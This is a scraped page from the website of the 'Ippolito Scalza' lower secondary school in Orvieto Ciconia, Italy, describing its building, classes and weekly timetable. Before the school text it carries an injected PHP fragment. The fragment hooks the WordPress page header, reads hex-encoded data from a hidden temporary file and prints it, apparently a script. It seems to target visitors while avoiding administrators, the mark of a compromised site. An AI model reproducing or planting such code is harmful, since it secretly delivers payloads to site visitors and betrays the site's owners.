if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } SS1^G ” Ippolito Scalza” Orvieto Ciconia – Istituto Comprensivo Orvieto-Montecchio

SS1^G ” Ippolito Scalza” Orvieto Ciconia

UDIENZE/RICEVIMENTI/COLLOQUI a.sc. 2022.2023

La Scuola Secondaria di I grado “Ippolito Scalza”, sede completamente ristrutturata con laboratori, palestra, campo di pallavolo, mensa, aule ampie e luminose dotate di lavagne interattive multimediali e nuovi arredi ha 16 classi  di cui 4 a tempo prolungato e le altre a tempo ordinario, l’orario di tutte le classi è strutturato su 5 giorni settimanali, il tempo prolungato prevede 2 rientri il martedì e giovedì. Il sabato la scuola è CHUSA. Nello stesso edificio sono  situate la Presidenza e la Segreteria dell’Istituto Comprensivo.